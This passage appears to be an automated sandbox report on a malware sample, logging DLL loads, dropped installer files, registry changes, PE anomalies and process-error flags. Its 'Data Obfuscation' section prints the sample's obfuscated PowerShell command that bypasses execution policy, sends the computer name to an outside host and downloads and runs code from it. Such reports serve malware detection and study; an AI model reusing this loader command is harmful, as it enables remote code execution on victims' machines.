              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: MdhO83N5Fm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: MdhO83N5Fm.exeStatic file information: File size 33189377 > 1048576
              Source: MdhO83N5Fm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xd98800
              Source: MdhO83N5Fm.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xf5a800
              Source: MdhO83N5Fm.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1c3a00
              Source: MdhO83N5Fm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: MdhO83N5Fm.exe, 00000000.00000003.2259303619.000000000C2E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: MdhO83N5Fm.exe, 00000000.00000003.2259303619.000000000C2E0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.9.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.7.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: MBL4EF1WJ27Y40L4B4G3AI.exe.3.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: MdhO83N5Fm.exeStatic PE information: section name: .symtab
              Source: MBL4EF1WJ27Y40L4B4G3AI.exe.3.drStatic PE information: section name: .didata
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.7.drStatic PE information: section name: .didata
              Source: MBL4EF1WJ27Y40L4B4G3AI.tmp.9.drStatic PE information: section name: .didata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_005429EE push edx; iretd 3_3_00542A18
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_3_0053D233 push 77494D39h; retf 3_3_0053D238
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeFile created: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeFile created: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-CNRVF.tmpJump to dropped file
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
